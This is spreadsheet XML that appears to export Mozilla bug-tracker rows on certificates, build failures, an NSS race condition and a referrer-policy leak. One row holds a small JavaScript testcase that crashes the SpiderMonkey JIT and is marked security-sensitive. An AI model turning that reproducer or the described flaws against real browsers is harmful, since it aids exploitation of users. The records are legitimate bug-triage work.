      <c r="H1368" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1368" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1368" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K1368" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1368" t="inlineStr"/>
      <c r="Q1368" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1368" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1368" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1368" t="n">
        <v>1</v>
      </c>
      <c r="U1368" t="n">
        <v>0</v>
      </c>
      <c r="V1368" t="n">
        <v>5</v>
      </c>
      <c r="W1368" t="inlineStr">
        <is>
          <t>The prod SSL cert expires soon (bug 1362568):
"""
$ heroku certs --app treeherder-prod
Name                   Common Name(s)          Expires               Trusted  Type
─────────────────────  ──────────────────────  ────────────────────  ───────  ────
parasaurolophus-99121  treeherder.mozilla.org  2017-06-01 12:00 UTC  True     SNI
$ heroku certs:info --app treeherder-prod
Fetching SSL certificate parasaurolophus-99121 info for treeherder-prod... done
Certificate details:
Common Name(s): treeherder.mozilla.org
Expires At:     2017-06-01 12:00 UTC
Issuer:         /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
Starts At:      2014-05-28 00:00 UTC
Subject:        /C=US/ST=CA/L=Mountain View/O=Mozilla Corporation/CN=treeherder.mozilla.org
SSL certificate is verified by a root authority.
"""
Rather than having to update the certs each time, we should use Heroku's new "Automated Certificate Management" feature, which automates SSL certificate management using Let's Encrypt:
https://devcenter.heroku.com/articles/automated-certificate-management
Once Heroku apps are using the SNI based SSL (which we are, as of bug 1316712), it's a zero-downtime, one CLI command step to switch to ACM:
https://devcenter.heroku.com/articles/automated-certificate-management#migrating-existing-applications
We should test on stage first, then migrate production.</t>
        </is>
      </c>
      <c r="X1368" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" t="n">
        <v>737759</v>
      </c>
      <c r="B1369" t="inlineStr">
        <is>
          <t>2012-03-20 23:09:02 -0700</t>
        </is>
      </c>
      <c r="C1369" t="inlineStr">
        <is>
          <t>signing is busted, Windows builds time out waiting on it</t>
        </is>
      </c>
      <c r="D1369" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1369" t="n">
        <v>1</v>
      </c>
      <c r="F1369" t="n">
        <v>1</v>
      </c>
      <c r="G1369" t="n">
        <v>5</v>
      </c>
      <c r="H1369" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1369" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1369" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1369" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1369" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1369" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N1369" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1369" t="inlineStr"/>
      <c r="Q1369" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1369" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1369" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1369" t="n">
        <v>1</v>
      </c>
      <c r="U1369" t="n">
        <v>0</v>
      </c>
      <c r="V1369" t="n">
        <v>9</v>
      </c>
      <c r="W1369" t="inlineStr">
        <is>
          <t>https://tbpl.mozilla.org/php/getParsedLog.php?id=10231890&amp;tree=Mozilla-Inbound
2012-03-20 21:22:42,921 - c565e542190e7fc7be754181002f6c3ddaf36c82: processing firefox\AccessibleMarshal.dll on https://signing2.build.scl1.mozilla.com:9110
command timed out: 1200 seconds without output, attempting to kill
https://tbpl.mozilla.org/php/getParsedLog.php?id=10232749&amp;tree=Mozilla-Inbound
2012-03-20 22:18:23,937 - 904aa769172a9ded75b10a502d06c247e7d99a1d: processing firefox\firefox.exe on https://signing2.build.scl1.mozilla.com:9110
command timed out: 1200 seconds without output, attempting to kill
I thought at first that it was just signing2 busted and signing1 was okay, because of
https://tbpl.mozilla.org/php/getParsedLog.php?id=10229274&amp;tree=Mozilla-Inbound
2012-03-20 18:24:32,405 - 18287276fa0eaa3ac93dcc64ac3b49926839e4af: processing firefox\firefox.exe on https://signing1.build.scl1.mozilla.com:9110
2012-03-20 18:24:32,765 - 18287276fa0eaa3ac93dcc64ac3b49926839e4af: uploading for signing
but that may just be a matter of "everything was fine at 18:24, and no longer fine at 22:18."</t>
        </is>
      </c>
      <c r="X1369" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" t="n">
        <v>1566532</v>
      </c>
      <c r="B1370" t="inlineStr">
        <is>
          <t>2019-07-16 10:35:49 -0700</t>
        </is>
      </c>
      <c r="C1370" t="inlineStr">
        <is>
          <t>Repeat TLS 1.0/1.1 deprecation scan cert scrape</t>
        </is>
      </c>
      <c r="D1370" t="inlineStr">
        <is>
          <t>2019-08-09 11:54:50 -0700</t>
        </is>
      </c>
      <c r="E1370" t="n">
        <v>1</v>
      </c>
      <c r="F1370" t="n">
        <v>1</v>
      </c>
      <c r="G1370" t="n">
        <v>5</v>
      </c>
      <c r="H1370" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1370" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J1370" t="inlineStr">
        <is>
          <t>Investigation</t>
        </is>
      </c>
      <c r="K1370" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1370" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1370" t="inlineStr"/>
      <c r="Q1370" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1370" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1370" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1370" t="n">
        <v>1</v>
      </c>
      <c r="U1370" t="n">
        <v>0</v>
      </c>
      <c r="V1370" t="n">
        <v>6</v>
      </c>
      <c r="W1370" t="inlineStr">
        <is>
          <t>Wayne says that some CAs would like to have a list of certificate serial numbers for sites that are only supporting deprecated TLS (i.e. ≤ 1.1) in order to facilitate outreach to site operators.
Mike, can you provide an update to the carnage list? If that's not easy to supply, I could just scan back over the older list and filter out anyone that negotiates modern TLS, on the assumption that sites shouldn't be regressing.</t>
        </is>
      </c>
      <c r="X1370" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" t="n">
        <v>1874502</v>
      </c>
      <c r="B1371" t="inlineStr">
        <is>
          <t>2024-01-12 14:12:44 -0800</t>
        </is>
      </c>
      <c r="C1371" t="inlineStr">
        <is>
          <t>Assertion failure: dest.isDouble(), at jit/arm/MacroAssembler-arm.cpp:195</t>
        </is>
      </c>
      <c r="D1371" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:01 -0700</t>
        </is>
      </c>
      <c r="E1371" t="n">
        <v>1</v>
      </c>
      <c r="F1371" t="n">
        <v>1</v>
      </c>
      <c r="G1371" t="n">
        <v>3</v>
      </c>
      <c r="H1371" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1371" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1371" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1371" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1371" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1371" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1371" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1371" t="inlineStr">
        <is>
          <t>[adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q1371" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1371" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1371" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T1371" t="n">
        <v>1</v>
      </c>
      <c r="U1371" t="n">
        <v>0</v>
      </c>
      <c r="V1371" t="n">
        <v>14</v>
      </c>
      <c r="W1371" t="inlineStr">
        <is>
          <t>Created attachment 9372654
debug shell stack
```
function f(x) {
  Math.fround(function () {
    x;
  });
}
for (let j = 0; j &lt; 29; j++) {
  f(Math.fround(1));
}
```
```
Assertion failure: dest.isDouble(), at /home/gen32gx500/trees/mozilla-central/js/src/jit/arm/MacroAssembler-arm.cpp:195
#01: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x2731ee3]
#02: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x274e9ad]
#03: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x26fbd29]
#04: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x290a2fe]
#05: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x296abb1]
#06: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x29b42c2]
#07: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x29b56d5]
#08: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x29b62de]
#09: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x29b6c47]
#10: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x2763d65]
#11: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x2760d57]
#12: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x27696ab]
#13: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x2769c70]
#14: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x25d2b87]
#15: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1a5b0d6]
#16: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1a55073]
#17: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1a54b9f]
#18: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1a57e1c]
#19: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1a5828a]
#20: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1bdecb8]
#21: JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;)[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1bdee98]
#22: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1994677]
#23: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1993767]
#24: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x1953758]
#25: ???[/home/gen32gx500/shell-cache/js-dbg-32-armsim32-linux-x86_64-734e2e027196/js-dbg-32-armsim32-linux-x86_64-734e2e027196 +0x194d636]
Segmentation fault
```
```
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/ee6468bab0dd
user:        Jan de Mooij
date:        Wed Apr 05 11:37:15 2023 +0000
summary:     Bug 1826078 part 4 - Optimize GC barriers for stores to MNewCallObject. r=iain
```
Run with `--fuzzing-safe --no-threads --fast-warmup`, compile with `PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig 'CC="clang -msse2 -mfpmath=sse"' 'CXX="clang++ -msse2 -mfpmath=sse"' AR=ar sh ../configure --host=x86_64-pc-linux-gnu --target=i686-pc-linux --enable-simulator=arm --enable-debug --enable-debug-symbols --with-ccache --enable-gczeal --enable-rust-simd --disable-tests`, tested on m-c rev 734e2e027196.
Jan/Iain, is bug 1826078 a likely regressor? Setting s-s just in case.</t>
        </is>
      </c>
      <c r="X1371" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" t="n">
        <v>1678545</v>
      </c>
      <c r="B1372" t="inlineStr">
        <is>
          <t>2020-11-20 00:01:13 -0800</t>
        </is>
      </c>
      <c r="C1372" t="inlineStr">
        <is>
          <t>Full referrer URL exposed even from websites using strict referrer policies (e.g. "no-referrer" or "strict-origin-when-cross-origin")</t>
        </is>
      </c>
      <c r="D1372" t="inlineStr">
        <is>
          <t>2024-05-30 10:23:58 -0700</t>
        </is>
      </c>
      <c r="E1372" t="n">
        <v>1</v>
      </c>
      <c r="F1372" t="n">
        <v>1</v>
      </c>
      <c r="G1372" t="n">
        <v>3</v>
      </c>
      <c r="H1372" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1372" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1372" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1372" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1372" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1372" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][domsecurity-active][post-critsmash-triage][adv-main86+]</t>
        </is>
      </c>
      <c r="Q1372" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1372" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1372" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T1372" t="n">
        <v>1</v>
      </c>
      <c r="U1372" t="n">
        <v>0</v>
      </c>
      <c r="V1372" t="n">
        <v>35</v>
      </c>
      <c r="W1372" t="inlineStr">
        <is>
          <t>Created attachment 9189089
referrer-stealing-poc.tgz
I discovered this issue while studying the Referrer-Policy standard (https://w3c.github.io/webappsec-referrer-policy/).
This seems to be caused by a wrong implementation of the standard, more in particular for what concerns the combination of "8.2. Set request’s referrer policy on redirect" and "8.3. Determine request’s Referrer".
If a server (also third-party ones) replies with a redirect response including a referrer-policy response header, it seems that, when computing the new referrer value for the redirected request, Firefox uses the document's URL as referrerSource, instead of the previously computed referrer value for the original request (which may even be "no-referrer"). This is in contrast with what the standard specifies and leads to this vulnerability. 
You can find more details in the attached PoC's README.md file.
I verified this issue on both Firefox 78.5.0esr and latest Firefox Nightly 85.0a1.</t>
        </is>
      </c>
      <c r="X1372" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" t="n">
        <v>134012</v>
      </c>
      <c r="B1373" t="inlineStr">
        <is>
          <t>2002-03-28 11:25:21 -0800</t>
        </is>
      </c>
      <c r="C1373" t="inlineStr">
        <is>
          <t>Static build fails on link stage</t>
        </is>
      </c>
      <c r="D1373" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1373" t="n">
        <v>1</v>
      </c>
      <c r="F1373" t="n">
        <v>1</v>
      </c>
      <c r="G1373" t="n">
        <v>2</v>
      </c>
      <c r="H1373" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1373" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1373" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K1373" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1373" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1373" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1373" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1373" t="inlineStr"/>
      <c r="Q1373" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1373" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1373" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T1373" t="n">
        <v>1</v>
      </c>
      <c r="U1373" t="n">
        <v>0</v>
      </c>
      <c r="V1373" t="n">
        <v>9</v>
      </c>
      <c r="W1373" t="inlineStr">
        <is>
          <t>A current checkout (10AM on 3/28/2002) fails to link in the static build but
does build and run correctly (for the most part) with the shared library build.
 (This is building on Linux - RedHat 7.2 based)
The .mozconfig file contains:
# sh
# Build configuration script
#
# See http://www.mozilla.org/build/unix.html for build instructions.
#
# Options for 'configure' (same as command-line options).
ac_add_options --enable-crypto
ac_add_options --disable-debug
ac_add_options --enable-static
ac_add_options --disable-shared
The link error is:
nsStaticComponents.o: In function `JavaScript_Debugger_NSGetmodule':
nsStaticComponents.o(.text+0x22d): undefined reference to
`JavaScript_Debugger_gModuleInfo'
nsStaticComponents.o: In function `nsInspectorModule_NSGetmodule':
nsStaticComponents.o(.text+0x94d): undefined reference to
`nsInspectorModule_gModuleInfo'
collect2: ld returned 1 exit status
make[3]: *** [mozilla-bin] Error 1
make[3]: Leaving directory `/usr/src/mozilla/mozilla/xpfe/bootstrap'
make[2]: *** [tier_99] Error 2
make[2]: Leaving directory `/usr/src/mozilla/mozilla'
make[1]: *** [default] Error 2
make[1]: Leaving directory `/usr/src/mozilla/mozilla'
make: *** [build] Error 2
I have done:
    make -f client.mk clean ; make -f client.mk
If I change this shared rather than static, the build works.  I have repeated
this twice.</t>
        </is>
      </c>
      <c r="X1373" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" t="n">
        <v>809652</v>
      </c>
      <c r="B1374" t="inlineStr">
        <is>
          <t>2012-11-07 15:16:33 -0800</t>
        </is>
      </c>
      <c r="C1374" t="inlineStr">
        <is>
          <t>Have SecurityWrapper deny access for various sketchy SM extensions</t>
        </is>
      </c>
      <c r="D1374" t="inlineStr">
        <is>
          <t>2014-11-19 19:35:50 -0800</t>
        </is>
      </c>
      <c r="E1374" t="n">
        <v>1</v>
      </c>
      <c r="F1374" t="n">
        <v>1</v>
      </c>
      <c r="G1374" t="n">
        <v>3</v>
      </c>
      <c r="H1374" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1374" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1374" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1374" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1374" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1374" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+] defense in depth against future vulns</t>
        </is>
      </c>
      <c r="Q1374" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1374" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1374" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1374" t="n">
        <v>1</v>
      </c>
      <c r="U1374" t="n">
        <v>0</v>
      </c>
      <c r="V1374" t="n">
        <v>55</v>
      </c>
      <c r="W1374" t="inlineStr">
        <is>
          <t>It looks like there was originally an intention to do this for things like nativeCall and objectClassIs, but it was thwarted by document.domain. We can do it now, though, once bug 800915 lands, and it'll be good defense-in-depth.</t>
        </is>
      </c>
      <c r="X1374" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" t="n">
        <v>1510104</v>
      </c>
      <c r="B1375" t="inlineStr">
        <is>
          <t>2018-11-26 18:28:15 -0800</t>
        </is>
      </c>
      <c r="C1375" t="inlineStr">
        <is>
          <t>Prototype platform gap metrics</t>
        </is>
      </c>
      <c r="D1375" t="inlineStr">
        <is>
          <t>2019-03-27 15:16:36 -0700</t>
        </is>
      </c>
      <c r="E1375" t="n">
        <v>1</v>
      </c>
      <c r="F1375" t="n">
        <v>1</v>
      </c>
      <c r="G1375" t="n">
        <v>5</v>
      </c>
      <c r="H1375" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1375" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J1375" t="inlineStr">
        <is>
          <t>Investigation</t>
        </is>
      </c>
      <c r="K1375" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1375" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1375" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1375" t="inlineStr"/>
      <c r="Q1375" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1375" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1375" t="n">
        <v>1</v>
      </c>
      <c r="U1375" t="n">
        <v>0</v>
      </c>
      <c r="V1375" t="n">
        <v>5</v>
      </c>
      <c r="W1375" t="inlineStr">
        <is>
          <t>Using data sources including the Chrome Web Confluence API implementation survey, Microsoft's Bing-powered usage counters, Chrome's usage counters, and Firefox's usage counters, can we evaluate whether we can improve web compatibility by implementing new or legacy API surface?</t>
        </is>
      </c>
      <c r="X1375" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" t="n">
        <v>930874</v>
      </c>
      <c r="B1376" t="inlineStr">
        <is>
          <t>2013-10-24 23:58:36 -0700</t>
        </is>
      </c>
      <c r="C1376" t="inlineStr">
        <is>
          <t>TOCTOU, potential use-after-free in libssl's session ticket processing due to lack of lock protecting the sessionTicket field of the sid</t>
        </is>
      </c>
      <c r="D1376" t="inlineStr">
        <is>
          <t>2014-03-03 15:43:30 -0800</t>
        </is>
      </c>
      <c r="E1376" t="n">
        <v>1</v>
      </c>
      <c r="F1376" t="n">
        <v>1</v>
      </c>
      <c r="G1376" t="n">
        <v>3</v>
      </c>
      <c r="H1376" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1376" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1376" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1376" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1376" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1376" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1376" t="inlineStr">
        <is>
          <t>[introduced in bug 403563][adv-main27+][adv-esr24.3+][qa-]</t>
        </is>
      </c>
      <c r="Q1376" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1376" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="T1376" t="n">
        <v>1</v>
      </c>
      <c r="U1376" t="n">
        <v>0</v>
      </c>
      <c r="V1376" t="n">
        <v>31</v>
      </c>
      <c r="W1376" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #930857 +++
It appear there are race conditions (TOCTOU, potentially use-after-free) to lack of locking around reads and updates of the sessionTicket field of sslSessionIDStr. For example, these races can happen when thread A is trying to resume a session concurrently with thread B that has already started resuming session that same session, and where thread B has received a NewSessionTicket extension that will cause it to update the sessionTicket field of the sid that thread A is trying to read. This may cause a use-after-free when ssl3_SetSIDSessionTicket calls SECITEM_FreeItem to free the session ticket data when ssl3_SendSessionTicketXtn is trying to read it. There are probably other similar problems.
We need locks to protect the sessionTicket field when we read it in ssl3_SendClientHello/ssl3_SendSessionTicketXtn and ssl3_HandleServerHello and  and CacheSID, and when we change update it in ssl3_SetSIDSessionTicket, at least.
Additionally, we may need to be careful about handling the case where the session ticket is modified by ssl3_SetSIDSessionTicket between execution of the above functions; i.e. we probably can't just acquire/release a mutex around the access of the sessionTicket field independently in each of the aforementioned functions; instead, we need to save some state between calls to those functions.  In the case of the gap between ssl3_SendClientHello/ssl3_SendSessionTicketXtn, we may be able to get away with just storing a PRBool sendSessionTicket in ss-&gt;ssl3.hs, instead of copying the entire ticket. I suspect that the type of problem described in this paragraph may occur even for single-threaded clients.
BTW, if we ever expose the session ticket to applications so that applications can associate the exact ticket used with a connection (actually a particular handshake on the connection), then would need to maintain an independent copy of the ticket data in ss-&gt;ssl3.hs at all times, instead of *moving* it from ss-&gt;ssl3.hs to the sid like this patch does.</t>
        </is>
      </c>
      <c r="X1376" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" t="n">
        <v>1364225</v>
      </c>
      <c r="B1377" t="inlineStr">
        <is>
          <t>2017-05-11 15:03:46 -0700</t>
        </is>
      </c>
      <c r="C1377" t="inlineStr">
        <is>
          <t>Devedition staging release based on jamun</t>
        </is>
      </c>
      <c r="D1377" t="inlineStr">
        <is>
          <t>2018-02-28 10:34:35 -0800</t>
        </is>
      </c>
      <c r="E1377" t="n">
        <v>1</v>
      </c>
      <c r="F1377" t="n">
        <v>1</v>
      </c>
      <c r="G1377" t="n">
        <v>5</v>
      </c>
      <c r="H1377" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1377" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1377" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K1377" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
